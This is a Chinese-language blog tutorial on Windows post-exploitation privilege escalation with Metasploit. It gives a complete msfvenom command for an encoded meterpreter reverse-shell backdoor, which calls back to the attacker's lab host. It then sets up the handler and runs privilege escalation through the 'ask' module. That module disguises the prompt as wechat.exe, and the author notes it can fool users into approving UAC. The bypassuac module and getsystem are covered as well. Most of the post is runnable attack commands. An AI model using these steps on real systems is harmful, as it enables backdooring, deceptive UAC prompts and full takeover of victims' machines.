后渗透 - windows权限提升

当我们获得一个网站的webshell后该如何提升权限呢?这里就针对windows来试试使用Metasploit提升权限

kali的ip:192.168.83.100
靶机 x86 win7 ip :192.168.83.33
假如我们已经拿到了靶机的webshell

我们先利用msfvenom生成一个后门,名字为msf.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.83.100 LPORT=6666 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe

参数解释:

--platform:平台
-p:payload
LHOST:监听主机(kali的ip)
LPORT:监听端口
-b:去除坏字符
-e:使用的编码
-f:生成文件格式


将生成的exe文件利用webshell管理工具上传到服务器
打开msfconsole
使用模块 exploit/multi/handler
执行use exploit/multi/handler

设置参数
set lhost 192.168.83.100
set lport 6666
set payload windows/meterpreter/reverse_tcp

执行
exploit

利用webshell执行上传的文件

然后msf获得了会话,session的id为4

当获得了session后,有两种情况

一种是你是欧皇,上来就是system权限

另一种情况你是非酋,不是system权限

然后你就要考虑怎么提权了

使用命令background将sessions放入后台
使用ask模块进行提权,使用该模块提权有个大问题,就是会触发uac机制

use exploit/windows/local/ask 

设置参数
set filename wechat.exe  #伪装应用
set session 5  #设置session的id,我id 4有system权限,现在将id 5提权

开始攻击
exploit


然后靶机就触发了uac....,emmmm骗骗傻子应该可以,只要他点了是,msf就会开启一个新的session,在新会话中使用getsystem命令后,再使用getuid查看就成为了system权限

使用bypassuac模块提权,该模块的好处是不会触发uac机制,但是需要靶机连接session的用户在admins组

use exploit/windows/local/bypassuac
set session 5
exploit

利用系统漏洞提权

关于session后台运行后怎么重新进入session:sessions -i [id]
删除session:session -k [id]

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容